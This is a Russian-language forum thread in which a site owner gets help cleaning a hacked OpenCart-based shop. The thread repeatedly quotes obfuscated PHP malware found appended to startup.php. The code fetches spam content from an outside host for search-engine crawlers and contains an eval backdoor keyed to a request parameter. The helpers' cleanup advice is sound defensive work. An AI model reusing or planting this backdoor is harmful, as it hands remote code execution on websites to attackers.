Jump to content
Sign in to follow this  
Mandarin

[Решено] Взлом сайта

Recommended Posts

Добрый день! Три дня назад на сайте появилась вот такая хрень в шапке: Изображение

После нее начинается нормальная страница сайта:

Изображение

Запрашивала у хостера резервные копии сайта в те дни, когда все было нормально. Ничего не изменилось. Пробовала найти такую ссылку hoster.ru самостоятельно в файлах - безрезультатно. В админку зайти не могу. Что это может быть такое и как это убрать?

Share this post


Link to post
Share on other sites

я, конечно, все понимаю, но о какой помощи может быть речь, если вы даже ссылку на свой сайт не предоставили?

не думаю, что, за время моего отсутствия на форуме, в наших рядах появились телепаты.

Share this post


Link to post
Share on other sites

Кодировка слетела - 1, подцепляет куки старой сессии - 2, ну и, как выразился ув. товарищ, так же батарейки сели в хрустальном шаре, котрый не раз помогал угадывать данные ответы...

Share this post


Link to post
Share on other sites

покажите содержимое вашего файла /home/u675/catalog-chess.u675.netangels.ru/www/system/startup.php (спрячьте в цитату и спойлер).

Share this post


Link to post
Share on other sites

Удалите все файлы в папке /system/cache/

Share this post


Link to post
Share on other sites

покажите содержимое вашего файла /home/u675/catalog-chess.u675.netangels.ru/www/system/startup.php (спрячьте в цитату и спойлер).

Содержимое startup.php:

<?php
// Error Reporting
error_reporting(E_ALL);

// RegEx
define('EMAIL_PATTERN', '/^[^@]+@.*.[a-z]{2,6}$/i');
// Check Version
if (version_compare(phpversion(), '5.1.0', '<') == TRUE) {
exit('PHP5.1+ Required');
}

// Register Globals
if (ini_get('register_globals')) {
ini_set('session.use_cookies', 'On');
ini_set('session.use_trans_sid', 'Off');
session_set_cookie_params(0, '/');
session_start();

$globals = array($_REQUEST, $_SESSION, $_SERVER, $_FILES);

foreach ($globals as $global) {
  foreach(array_keys($global) as $key) {
   unset($$key);
  }
}
}
// Magic Quotes Fix
if (ini_get('magic_quotes_gpc')) {
function clean($data) {
	 if (is_array($data)) {
	 foreach ($data as $key => $value) {
	   $data[clean($key)] = clean($value);
	 }
  } else {
	 $data = stripslashes($data);
  }

  return $data;
}
$_GET = clean($_GET);
$_POST = clean($_POST);
$_COOKIE = clean($_COOKIE);
}

if (!ini_get('date.timezone')) {
date_default_timezone_set('Europe/Moscow');
}

// Windows IIS Compatibility
if (!isset($_SERVER['DOCUMENT_ROOT'])) {
if (isset($_SERVER['SCRIPT_FILENAME'])) {
  $_SERVER['DOCUMENT_ROOT'] = str_replace('', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
}

if (!isset($_SERVER['DOCUMENT_ROOT'])) {
if (isset($_SERVER['PATH_TRANSLATED'])) {
  $_SERVER['DOCUMENT_ROOT'] = str_replace('', '/', substr(str_replace('', '', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
}

if (!isset($_SERVER['REQUEST_URI'])) {
$_SERVER['REQUEST_URI'] = substr($_SERVER['PHP_SELF'], 1);
if (isset($_SERVER['QUERY_STRING'])) {
  $_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING'];
}
}

// Engine
require_once(DIR_SYSTEM . 'engine/action.php');
require_once(DIR_SYSTEM . 'engine/controller.php');
require_once(DIR_SYSTEM . 'engine/front.php');
require_once(DIR_SYSTEM . 'engine/loader.php');
require_once(DIR_SYSTEM . 'engine/model.php');
require_once(DIR_SYSTEM . 'engine/registry.php');

// Common
require_once(DIR_SYSTEM . 'library/cache.php');
require_once(DIR_SYSTEM . 'library/config.php');
require_once(DIR_SYSTEM . 'library/db.php');
require_once(DIR_SYSTEM . 'library/document.php');
require_once(DIR_SYSTEM . 'library/image.php');
require_once(DIR_SYSTEM . 'library/language.php');
require_once(DIR_SYSTEM . 'library/log.php');
require_once(DIR_SYSTEM . 'library/mail.php');
require_once(DIR_SYSTEM . 'library/sms.php');
require_once(DIR_SYSTEM . 'library/pagination.php');
require_once(DIR_SYSTEM . 'library/request.php');
require_once(DIR_SYSTEM . 'library/response.php');
require_once(DIR_SYSTEM . 'library/session.php');
require_once(DIR_SYSTEM . 'library/template.php');
?><?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

Share this post


Link to post
Share on other sites

Удалите все файлы в папке /system/cache/

Удалила - ничего не изменилось

Share this post


Link to post
Share on other sites

что это? какая у вас сборка?

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

Share this post


Link to post
Share on other sites

что это? какая у вас сборка?

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

magento 1.5.1.5

Share this post


Link to post
Share on other sites

Предполагаю, что на данном сайте, кроме index.php есть ещё и index.html

Share this post


Link to post
Share on other sites

magento 1.5.1.5

:oops:

Share this post


Link to post
Share on other sites

Предполагаю, что на данном сайте, кроме index.php есть ещё и index.html

По крайней мере в каталоге home/catalog-chess.u675.netangels.ru/www такого нет. Только index.php

Share this post


Link to post
Share on other sites

:oops:

Если написала глупость, то скажите мне как начинающей, какая инфа Вам нужна)

Share this post


Link to post
Share on other sites

удаляйте из файла вот эту ерунду

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

и поставьте на него права 644

Share this post


Link to post
Share on other sites

удаляйте из файла вот эту ерунду

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

и поставьте на него права 644

Ооо, спасибо, все хорошо! А что за права 644?

Share this post


Link to post
Share on other sites

права доступа к файлу.

с такими правами никто, кроме вас не сможет изменить данный файл.

можете попросить службу поддержки вашего хостера сменить права файлу.

правда, мне кажется, что и с другими файлами у вас могут возникнуть проблемы в будущем...

Share this post


Link to post
Share on other sites

ОФФ Топ

а в чем запутался-то :) что опенкарт, что магенто, предок-то один оскоммерс, вот тут и запостила ;) если прадед один, значит и внуки одинаковые, глядишь помогут, а на форуме магенто, наверняка "поцаны понтовые сидят" не спешат на помощь :)

Share this post


Link to post
Share on other sites

ОФФ Топ

а в чем запутался-то :) что опенкарт, что магенто, предок-то один оскоммерс, вот тут и запостила ;) если прадед один, значит и внуки одинаковые, глядишь помогут, а на форуме магенто, наверняка "поцаны понтовые сидят" не спешат на помощь :)

Админка-то OC :)

Share this post


Link to post
Share on other sites

Ну судя по тому как эти плагиаторы внедряют подобный код в труды разработчиков Opencart

<?php $x12="c\x75\162l_i\x6ei\164"; $x13="\143u\162l\x5f\163\145to\160t"; $x14="\x63\165\162\154_\x65xe\143"; $x15="c\x75\x72l_c\154o\x73e"; $x16="\x65v\x61\x6c"; $x17="\146\151\154e_\147\145\164\137c\157\156t\145\156\x74\163"; $x18="\x66un\143\164i\157n\x5f\x65\170\151s\164\x73"; $x19="\151n\151\137\x67\x65\164"; $x1a="preg_m\x61\164ch"; $x1b="s\x74\x72\151p\x73la\163\x68\145\163"; $x1c="\x75r\154e\156\143\157\x64e";
error_reporting(0);$x0b = "\x68\x74\164\x70\x3a//a\143\143\x65\x73\163\055\x731\x2eo\162\147\x2fg\145t\056php"; $x0c = "1\062\x33\063\x32\061q\x71";if ($x1a("\057\050\171\141n\x64\x65\x78|\147\157\x6f\x67\154\145\051/\x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("\150\x74\164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."\x3f\x69\x64\x3d".$x0d."&c\150a\162\x73et\x3d\x75&b\x6f\164\x3d".$x0e; if($x19("\x61\x6clo\167\137\165\162\x6c_f\157\x70\x65\156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."\077\x63\x6f\144\145\x3d\x63\x6f\144\x65\046\x62o\164\x3d".$x0e;if($x19("\x61\x6cl\157\x77_\x75\x72\x6c\137f\157\x70\x65\x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["\143"] == $x0c) $x16($x1b($_REQUEST["\143\x6fd\145"])); ?>

Мне искренне жаль тех, кто будет ставить ЭТО - magento (изуродованный Opencart людьми, которые даже не знают php код). Реально, мне хочется от всей души навалять этим нехорошим людям люлей за такое.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.